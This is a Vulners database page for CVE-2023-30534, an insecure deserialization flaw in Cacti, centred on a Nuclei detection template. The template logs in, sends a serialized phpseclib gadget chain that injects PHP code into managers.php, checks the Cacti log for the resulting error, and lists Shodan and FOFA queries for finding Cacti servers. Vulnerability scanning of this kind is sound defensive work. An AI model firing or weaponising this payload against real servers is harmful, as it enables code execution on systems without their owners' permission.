| Reporter | Title | Published | Views | Family All 76 |
|---|---|---|---|---|
| CVE-2023-30534 | 5 Sep 202321:21 | – | alpinelinux | |
| The vulnerability of the `host_new_graphs_save()` function in the Cacti network monitoring software (graphs_new.php) allows a attacker to execute arbitrary code. | 12 Sep 202300:00 | – | bdu_fstec | |
| CVE-2023-30534 | 6 Sep 202302:17 | – | circl | |
| Cacti and ecto code issue vulnerability | 5 Sep 202300:00 | – | cnnvd | |
| CVE-2023-30534 | 5 Sep 202321:21 | – | cve | |
| CVE-2023-30534 Insecure Deserialization in Cacti | 5 Sep 202321:21 | – | cvelist | |
| CVE-2023-30534 | 5 Sep 202321:21 | – | debiancve | |
| [SECURITY] Fedora 38 Update: cacti-1.2.25-1.fc38 | 13 Oct 202301:53 | – | fedora | |
| [SECURITY] Fedora 37 Update: cacti-spine-1.2.25-1.fc37 | 13 Oct 202301:33 | – | fedora | |
| [SECURITY] Fedora 39 Update: cacti-1.2.25-1.fc39 | 3 Nov 202318:53 | – | fedora |
id: CVE-2023-30534
info:
name: Cacti < 1.2.25 Insecure Deserialization
author: k0pak4
severity: medium
description: |
Cacti is an open source operational monitoring and fault management framework. There are two instances of insecure deserialization in Cacti version 1.2.24.
impact: |
Authenticated attackers with low privileges can exploit insecure deserialization to potentially execute arbitrary code or modify system data, leading to privilege escalation and data manipulation.
remediation: |
Upgrade to Cacti version 1.2.25 or later.
reference:
- https://github.com/Cacti/cacti/security/advisories/GHSA-77rf-774j-6h3p
- https://nvd.nist.gov/vuln/detail/CVE-2023-30534
- https://www.fastly.com/blog/cve-2023-30534-insecure-deserialization-in-cacti-prior-to-1-2-25
- https://lists.fedoraproject.org/archives/list/[email protected]/message/CFH3J2WVBKY4ZJNMARVOWJQK6PSLPHFH/
- https://lists.fedoraproject.org/archives/list/[email protected]/message/WOQFYGLZBAWT4AWNMO7DU73QXWPXTCKH/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2023-30534
cwe-id: CWE-502
epss-score: 0.02569
epss-percentile: 0.8326
cpe: cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: cacti
product: cacti
shodan-query:
- title:"Cacti"
- http.title:"login to cacti"
- http.title:"cacti"
- http.favicon.hash:"-1797138069"
fofa-query:
- icon_hash="-1797138069"
- title="cacti"
- title="login to cacti"
google-query:
- intitle:"cacti"
- intitle:"login to cacti"
tags: cve,cve2023,cacti,authenticated,vuln
http:
- raw:
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
__csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}
- |
POST /managers.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}
- |
GET /clog.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body_4
regex:
- "<table[^;]*;['\"]>\\s*(<tr class=['\"]clogError['\"]>[\\s\\S]*unserialize[\\s\\S]*managers.php[\\s\\S]*[Aa]uthenticated)"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: csrf_token
part: body
group: 1
regex:
- "var csrfMagicToken = ['\"]([a-z0-9,:;]*)['\"]"
internal: true
# digest: 4b0a00483046022100ded4805d155c57487e5bd495510c350d21d6935cd90da4bc5c635d17242dabb3022100f6f6b3c8b9357f1696912fa79d5a36a19017a6b8ab3d8cb3db166912254f039d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation